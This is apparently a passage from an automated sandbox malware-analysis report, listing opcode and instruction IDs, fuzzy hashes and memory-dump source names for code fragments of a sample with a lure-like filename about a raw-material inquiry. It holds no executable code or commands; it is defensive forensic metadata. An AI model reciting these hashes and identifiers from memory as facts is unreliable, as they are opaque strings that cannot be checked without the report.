                                                                        • Instruction ID: c521e0c377140b310e0b06fa3cb5c6e0683623102af597343c7f375d5c70fbc4
                                                                        • Opcode Fuzzy Hash: 16b984d21a50bd76ce680db92ec7db6002d8e0eaf55f1631d0975c8c7ffe0d9a
                                                                        • Instruction Fuzzy Hash: F9012CB1A00209AFDB04DFA9D541AAEB7F8EF48304F50406AFA14F7391D6749E018BA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b402cc97eb64c84d3e8fb3b08d79e061192041b035adbf6304e9b711c8f46b4d
                                                                        • Instruction ID: e2d2064a138558bd6d55cc81bba4287a3d794a43627f30444e9459258351b20d
                                                                        • Opcode Fuzzy Hash: b402cc97eb64c84d3e8fb3b08d79e061192041b035adbf6304e9b711c8f46b4d
                                                                        • Instruction Fuzzy Hash: 4B012CB1A10209AFDB04DFA9D551AAEB7F8EF48304F10406AF904F7391D674AA018BA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 445330289dd503113cb882239873d431ebf080892f239e82bc607626c1665dc3
                                                                        • Instruction ID: d515362e9c1400646b3fc38937f72d2521bce992d461cb1b3a7c32f2eac2a9cc
                                                                        • Opcode Fuzzy Hash: 445330289dd503113cb882239873d431ebf080892f239e82bc607626c1665dc3
                                                                        • Instruction Fuzzy Hash: BF012CB1A10209AFDB04DFA9D551AAEB7F8EF88304F10406AF904F7391D6749A018BA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                        • Instruction ID: cb0b3027e3f02bcf48e7d45250e5f2c9e53525d80963733391bf70a1e46ea515
                                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                        • Instruction Fuzzy Hash: 82F0C233215A22DBC73257594840BABA6D6EFC5B64F6A5036F10B9B304CA64DC02A6F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                        • Instruction ID: 99b2fb40dc2b97b1402cafb564af7111f18d2bbffd757e9f0bc8677cb604b0db
                                                                        • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                        • Instruction Fuzzy Hash: B301493160068D9BC3328718CA09F69BFD8EF41718F0D8062FA149BB91DA78DC00C631
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6aae81f5f37617af39cc180d3c73269e2974a142df5edc622418d1a509ad2950
                                                                        • Instruction ID: 41820c4ac93e938851e01476c001ecd6b9982c7e341e4f5c767db8f60b3fab7d
                                                                        • Opcode Fuzzy Hash: 6aae81f5f37617af39cc180d3c73269e2974a142df5edc622418d1a509ad2950
                                                                        • Instruction Fuzzy Hash: 54017C71A012489FDB00DFA9D841EEEB7F8AF48710F14005AF900B7290D774AA01CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                        • Instruction ID: 1ab3d14b2cfccfd31b8b32e838480dadaca9f4ee443bca946ad3b2197b96cb5c
                                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                        • Instruction Fuzzy Hash: 03F01D7220005DBFEF019F94DD81DAF7BBDEB593D8B114125FA11A2161D631DE21ABB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 957245fb03952dc2937bddaf5aa04b7bcd7c2c9cd212260f2dbd2b402b3dc818
                                                                        • Instruction ID: dafdc28c3d7cd06f86b900e7d5ef06fa861e9fdf659e7d73524a402c567bd63f
                                                                        • Opcode Fuzzy Hash: 957245fb03952dc2937bddaf5aa04b7bcd7c2c9cd212260f2dbd2b402b3dc818
                                                                        • Instruction Fuzzy Hash: FE018936100109ABCF129F84ED40EDE3B66FB4C764F0A8211FE1866220C236D970EF82
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f99100e7e942725018f6c1394abe3160c5d12c00d19147078fbdb64020a7a12c
                                                                        • Instruction ID: c8db4084a1ed2b09bff1d1012105493ac295b6af896850df0469a569417a4c21
                                                                        • Opcode Fuzzy Hash: f99100e7e942725018f6c1394abe3160c5d12c00d19147078fbdb64020a7a12c
                                                                        • Instruction Fuzzy Hash: 33F0BB716243019BE794961DDC01FB23295F7D0791F699079E60A9F3C2E971DC4183B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b8cc4774128b4a2e5810dbbaa90b6c98f5c263ecca0db6fdbe160f610edd51bc
                                                                        • Instruction ID: 15df24b53985f1f1f7e77c39c3f23958c963b0be595ec1a20aa9b44c81cc51cd
                                                                        • Opcode Fuzzy Hash: b8cc4774128b4a2e5810dbbaa90b6c98f5c263ecca0db6fdbe160f610edd51bc
                                                                        • Instruction Fuzzy Hash: A401A4B1200A849FE3229738CD4DF3637E4EB40B04F598690BA01BBBE2D728E801C530
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                        • Instruction ID: b26c8454edec7bb2c4dcea34d7a4edf15d5d84549726fbc6f187ee7b794ccb5d
                                                                        • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                        • Instruction Fuzzy Hash: D0F0E2713C1E1347DB35BA2AB820F2AA296AF80B94B05263DA405EB7C0DF20DC0087A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0449245e0ad9a4ceae1806d33dfa3e118fadcc7d8fe32782a19035a390947389
                                                                        • Instruction ID: e0ef5f7a9b5b25a48bcc07c1697d21ca9dd54ba08ed325dc4436f1832830567e
                                                                        • Opcode Fuzzy Hash: 0449245e0ad9a4ceae1806d33dfa3e118fadcc7d8fe32782a19035a390947389
                                                                        • Instruction Fuzzy Hash: 65F0C2706063049FC314EF29C942E1BF7E4EF88700F40565AB898EB3D1E634EA00CB96
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                        • Instruction ID: c594b6631b0ecfd13fb4c339c415e570fc9c4ed8078f33c92562d409277e6a17
                                                                        • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                        • Instruction Fuzzy Hash: 0FF03A32A116519BDB359A49EC80F16B3A8FB89B60F2D1065A504BB761C660EC0187E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                        • Instruction ID: 2bdd00df528828063a9b4809ff7158f853d65996f8c6ba77d914ac4a884c67f5
                                                                        • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                        • Instruction Fuzzy Hash: 5EF0B472610204AFE714EB21CC01F96B7E9EF98740F15C078A645DB265FAB0DE01D674
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 815c7e0a8a4da58acb8dfabeb82e61027dbfe047212337e687c188641bfcdb84
                                                                        • Instruction ID: fe7468a5ada9de117aab49f8fb7453e2f7cd429453e1e92c3c1157a7cfb2846c
                                                                        • Opcode Fuzzy Hash: 815c7e0a8a4da58acb8dfabeb82e61027dbfe047212337e687c188641bfcdb84
                                                                        • Instruction Fuzzy Hash: F8F0AF70A02208AFCB04EF69D511E9EB7F4EF48300F108066B905EB381DA74EA01CB60
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1fa80c975306ffd16e10d40d2529f0d5a6f3ef7da85d48357741679492e367b1
                                                                        • Instruction ID: 78b25b9b85219431db3763749290725050c4af99388f0b8d1e3e2fbeb9b0acae
                                                                        • Opcode Fuzzy Hash: 1fa80c975306ffd16e10d40d2529f0d5a6f3ef7da85d48357741679492e367b1
                                                                        • Instruction Fuzzy Hash: 69F0BE319126E29FEB32CB68C474F22B7D49F00720F1C896ED48987742C764DC80C670
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b213dc8a50b889d061021816cfe9861f8e881b900e321ed932c9356012483845
                                                                        • Instruction ID: 6da9d7d33628016f9fd61e1d331ebfeb3b55227d564a89a89554985fb0c08a02
                                                                        • Opcode Fuzzy Hash: b213dc8a50b889d061021816cfe9861f8e881b900e321ed932c9356012483845
                                                                        • Instruction Fuzzy Hash: A5F0272641B6800ACB627B387C5A2D26BA59781338F193185D4AC77216C5788C8BC324
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 918c92eb2852c0111389deaa1df9d9b62b858c195fae20d9316683a4d743c891
                                                                        • Instruction ID: cfae8f9e62526344353ec0c325429f684b8cae21c395dea7cfa2da86924d5912
                                                                        • Opcode Fuzzy Hash: 918c92eb2852c0111389deaa1df9d9b62b858c195fae20d9316683a4d743c891
                                                                        • Instruction Fuzzy Hash: F6F0BE7153965CABD7229718C248B71B3D4AB04BA0F1EF426D646C7662C260CCA1CA70
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                        • Instruction ID: d145c622b6e6edb74953b78940f39aa7f86dbfc7556f7b27771561203ecc76f0
                                                                        • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                        • Instruction Fuzzy Hash: 66E09272300A002BD711AE599C85F4777AEDF82B14F04007DB6046E293C9E29D4982A4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                        • Instruction ID: 04f89897bf0e8b6facab750271d06c864c3296db7660138f367669e4fc5141ee
                                                                        • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                        • Instruction Fuzzy Hash: 81F06572104604DFE3309F05D944F92B7E8EB0536AF95C426EA09AB6A1D379EC44DBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                        • Instruction ID: f64e8936b98217904a7bc61dd7c1a5fe1f11f49adcb5a22531c7c49d51386dab
                                                                        • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                        • Instruction Fuzzy Hash: C5F0A039204341DBDB19CF15C040EE57BA8EB41350B240059FC468B341D731E981CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                        • Instruction ID: 5e440cded11664d03acfe733e534280d0ec0b7f32bd0bb73e3fecb4096a1b4a4
                                                                        • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                        • Instruction Fuzzy Hash: D6E0D83228454DABC3212A5D9801B7777A5DBD07A4F1F8429F3408B250DB74DC40D7F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a33687de6bcaa5ee78a911f18f43e2e50108f5d54a99922de35c46d65ff883e0
                                                                        • Instruction ID: 951fb76e99ceeaff6d7e55a3278aa2c5305317254f4cf46d6caf98cf063dcb28
                                                                        • Opcode Fuzzy Hash: a33687de6bcaa5ee78a911f18f43e2e50108f5d54a99922de35c46d65ff883e0
                                                                        • Instruction Fuzzy Hash: 3BF0E5B19275914FDF71D729E140F5273E0EB10778F0A2554D40097A92C320DCC2C660
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction ID: 1d56d6912a78287fd5b55436f6880ff1a81929bb81da59284daa56503763dab1
                                                                        • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                        • Instruction Fuzzy Hash: 37E0DF32A40124BFDB21A7999D02F9BBABCDB80FA4F050056B600E7190D530EE00D6A0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                        • Instruction ID: 23fb0eb0a6a3a3dd4cc45aae65b8156454c164f03247e96e2a9cc32418cbcab0
                                                                        • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                        • Instruction Fuzzy Hash: 56E09B727403508FCF388A19C141A93B7E8DFA5B64F6590A9DE0557612C231FCC3C6D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                        • Instruction ID: 138071611c3c1b417daa29f9c7aeb5701429830a07696b4db3080359b643ecc3
                                                                        • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                        • Instruction Fuzzy Hash: BAE06531020A51DBD7326B26C909B66B7E0EF80715F18C82DB0AA225B1D7B6ACC0CA61
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 202211ad39bdc14def3c7d3f56860b67fc9dea5162b51cdd6164bf0f3c7414dd
                                                                        • Instruction ID: a849f7d7151fb26766cb111d10a005e2869ec8d3417d0365f4c54f6b6576e59a
                                                                        • Opcode Fuzzy Hash: 202211ad39bdc14def3c7d3f56860b67fc9dea5162b51cdd6164bf0f3c7414dd
                                                                        • Instruction Fuzzy Hash: 7DE09232100A949BC322BB29DD16F9B77EAEF50364F014519F115671A1CA34A950CBA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                        • Instruction ID: dfe0db882e815a3b25b67549e465b47c90472d1e3d5288eab4bb00788b1cc909
                                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                        • Instruction Fuzzy Hash: E7E0C2B43003058FD715CF19D040B6277B6BFD5B14F28C068A9488F245EB33E852CB41
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                        • Instruction ID: 701b00f7a56f30a242102469b1f9bd772930829695fa70dada37092e0ddddcc8
                                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                        • Instruction Fuzzy Hash: 70E08C31000A20EEDB312F26DC05B9176EAFB54B10F24582AF282260A48B74ACC1EA68
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: de61958b222be3febd35a9e21b1f2fc6929d8796b908a1e6f33f5911b31589b7
                                                                        • Instruction ID: 96e52e35c4f750f1922be215d167ac13dfe6e02b4aaded1d79f2162f96d7aec0
                                                                        • Opcode Fuzzy Hash: de61958b222be3febd35a9e21b1f2fc6929d8796b908a1e6f33f5911b31589b7
                                                                        • Instruction Fuzzy Hash: 73E0C2331005A06BC312FB5DDD12F5B73AEEF94360F000229F151972A1CA34AD00C7B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction ID: 75cb6a3ee80a7ed70604a93f124b24690028bff013c39b2fe085b785aa614965
                                                                        • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                        • Instruction Fuzzy Hash: 6CE08633111A1887C728DE18D511B7277A4EF45720F19863EA65747780C934E944D7A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                        • Instruction ID: de89b0bfe14bfeef82bb93f775ac3f1a56066017d674f80299ac6d383ff2d455
                                                                        • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                        • Instruction Fuzzy Hash: 90D05E36511A50AFC3329F1BEA00C53BBF9FFC4B10705062FA44593A20C670AC46CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction ID: ee9d22b7324eb4e4758ab1e98e1490344f0b62cb3d5118457a7d672be383f043
                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                        • Instruction Fuzzy Hash: EDD0A932214A60ABD732AA1CFC04FC333E8AB88720F06045AB008D7161C3A0AC81CA94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction ID: 0735f121160eac2cd278d3f0389212faf90c875c0510daeb1031e5a4d3d7525f
                                                                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                        • Instruction Fuzzy Hash: 3BE0EC759506849BCF22DF59C644F5ABBB9FB84B40F151058A0086B761C624AD00CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
